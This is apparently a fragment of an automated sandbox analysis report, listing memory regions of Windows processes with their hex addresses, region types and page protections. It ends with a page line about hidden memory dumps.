||
|
231779FC000
|
heap
|
page read and write
|
||
|
23177895000
|
heap
|
page read and write
|
||
|
24518963000
|
heap
|
page read and write
|
||
|
23175B96000
|
heap
|
page read and write
|
||
|
231779CC000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
23177898000
|
heap
|
page read and write
|
||
|
231779CE000
|
heap
|
page read and write
|
||
|
23177947000
|
heap
|
page read and write
|
||
|
7FFAAC3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23177A01000
|
heap
|
page read and write
|
||
|
23175990000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
24518688000
|
heap
|
page read and write
|
||
|
231778B1000
|
heap
|
page read and write
|
||
|
231779EA000
|
heap
|
page read and write
|
||
|
24500060000
|
trusted library allocation
|
page read and write
|
||
|
23177C85000
|
heap
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
231778E6000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
7FFAAC222000
|
trusted library allocation
|
page read and write
|
||
|
23177500000
|
remote allocation
|
page read and write
|
||
|
23175B88000
|
heap
|
page read and write
|
||
|
7DF4336B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
2457E440000
|
heap
|
page read and write
|
||
|
2317786F000
|
heap
|
page read and write
|
||
|
231778A9000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
|
231779EA000
|
heap
|
page read and write
|
||
|
2317791E000
|
heap
|
page read and write
|
||
|
231778AE000
|
heap
|
page read and write
|
||
|
7FFAAC230000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
231779CC000
|
heap
|
page read and write
|
||
|
16859540000
|
heap
|
page read and write
|
||
|
23177963000
|
heap
|
page read and write
|
||
|
7FFAAC240000
|
trusted library allocation
|
page read and write
|
||
|
23177A8E000
|
heap
|
page read and write
|
||
|
24518BE0000
|
heap
|
page read and write
|
||
|
23177862000
|
heap
|
page read and write
|
||
|
2457E484000
|
heap
|
page read and write
|
||
|
2457FDE0000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
16859130000
|
heap
|
page read and write
|
||
|
89CA9EF000
|
stack
|
page read and write
|
||
|
23177879000
|
heap
|
page read and write
|
||
|
89CB27E000
|
stack
|
page read and write
|
||
|
23177D21000
|
heap
|
page read and write
|
||
|
23175A90000
|
heap
|
page read and write
|
||
|
23177890000
|
heap
|
page read and write
|
||
|
89CA9A3000
|
stack
|
page read and write
|
||
|
2451054D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page execute and read and write
|
||
|
23177A98000
|
heap
|
page read and write
|
||
|
7FFAAC402000
|
trusted library allocation
|
page read and write
|
||
|
231778BE000
|
heap
|
page read and write
|
||
|
23177A61000
|
heap
|
page read and write
|
||
|
231778DA000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
23177DE2000
|
heap
|
page read and write
|
||
|
231778F3000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
23175B60000
|
heap
|
page read and write
|
||
|
231778DD000
|
heap
|
page read and write
|
||
|
23175B9E000
|
heap
|
page read and write
|
||
|
23177DE3000
|
heap
|
page read and write
|
||
|
2317796F000
|
heap
|
page read and write
|
||
|
2317790B000
|
heap
|
page read and write
|
||
|
2451892C000
|
heap
|
page read and write
|
||
|
CFA69FE000
|
stack
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
2457E3B0000
|
heap
|
page read and write
|
||
|
2457E595000
|
heap
|
page read and write
|
||
|
2317787C000
|
heap
|
page read and write
|
||
|
23177A64000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
23175DFE000
|
heap
|
page read and write
|
||
|
2457E436000
|
heap
|
page read and write
|
||
|
24500090000
|
trusted library allocation
|
page read and write
|
||
|
23177CE8000
|
heap
|
page read and write
|
||
|
7FFAAC2D6000
|
trusted library allocation
|
page read and write
|
||
|
23177C8E000
|
heap
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
23177CA2000
|
heap
|
page read and write
|
||
|
24510261000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
|
231779EA000
|
heap
|
page read and write
|
||
|
23177885000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
23175B8F000
|
heap
|
page read and write
|
||
|
23177960000
|
heap
|
page read and write
|
||
|
23175C3F000
|
heap
|
page read and write
|
||
|
23177DDF000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
23177A90000
|
heap
|
page read and write
|
||
|
24501B22000
|
trusted library allocation
|
page read and write
|
||
|
231779ED000
|
heap
|
page read and write
|
||
|
245188C0000
|
heap
|
page read and write
|
||
|
2450206E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
|
23177A9E000
|
heap
|
page read and write
|
||
|
89CBE4E000
|
stack
|
page read and write
|
||
|
23177C60000
|
heap
|
page read and write
|
||
|
245000C0000
|
trusted library allocation
|
page read and write
|
||
|
23177AAB000
|
heap
|
page read and write
|
||
|
23177A07000
|
heap
|
page read and write
|
||
|
23177A01000
|
heap
|
page read and write
|
||
|
245006E8000
|
trusted library allocation
|
page read and write
|
||
|
231779F1000
|
heap
|
page read and write
|
||
|
24500487000
|
trusted library allocation
|
page read and write
|
||
|
23175B95000
|
heap
|
page read and write
|
||
|
2457E407000
|
heap
|
page read and write
|
||
|
245006DA000
|
trusted library allocation
|
page read and write
|
||
|
2457E49F000
|
heap
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
|
231778C1000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2457E3F0000
|
heap
|
page read and write
|
||
|
23177862000
|
heap
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
2317794F000
|
heap
|
page read and write
|
||
|
23177895000
|
heap
|
page read and write
|
||
|
2450008A000
|
heap
|
page read and write
|
||
|
245020AE000
|
trusted library allocation
|
page read and write
|
||
|
231779EA000
|
heap
|
page read and write
|
||
|
7FFAAC223000
|
trusted library allocation
|
page execute and read and write
|
||
|
23175B72000
|
heap
|
page read and write
|
||
|
7FFAAC306000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC224000
|
trusted library allocation
|
page read and write
|
||
|
23177E81000
|
heap
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
24518B30000
|
heap
|
page read and write
|
||
|
23177F21000
|
heap
|
page read and write
|
||
|
24500261000
|
trusted library allocation
|
page read and write
|
||
|
24500102000
|
heap
|
page read and write
|
||
|
89CAEFF000
|
stack
|
page read and write
|
||
|
245002E5000
|
trusted library allocation
|
page read and write
|
||
|
23177AB2000
|
heap
|
page read and write
|
||
|
23177895000
|
heap
|
page read and write
|
||
|
231779D2000
|
heap
|
page read and write
|
||
|
2451890B000
|
heap
|
page read and write
|
||
|
245006FD000
|
trusted library allocation
|
page read and write
|
||
|
23175C1A000
|
heap
|
page read and write
|
||
|
24500B43000
|
trusted library allocation
|
page read and write
|
||
|
24500020000
|
trusted library allocation
|
page read and write
|
||
|
23177CBE000
|
heap
|
page read and write
|
||
|
2450203C000
|
trusted library allocation
|
page read and write
|
There are 447 hidden memdumps, click here to show them.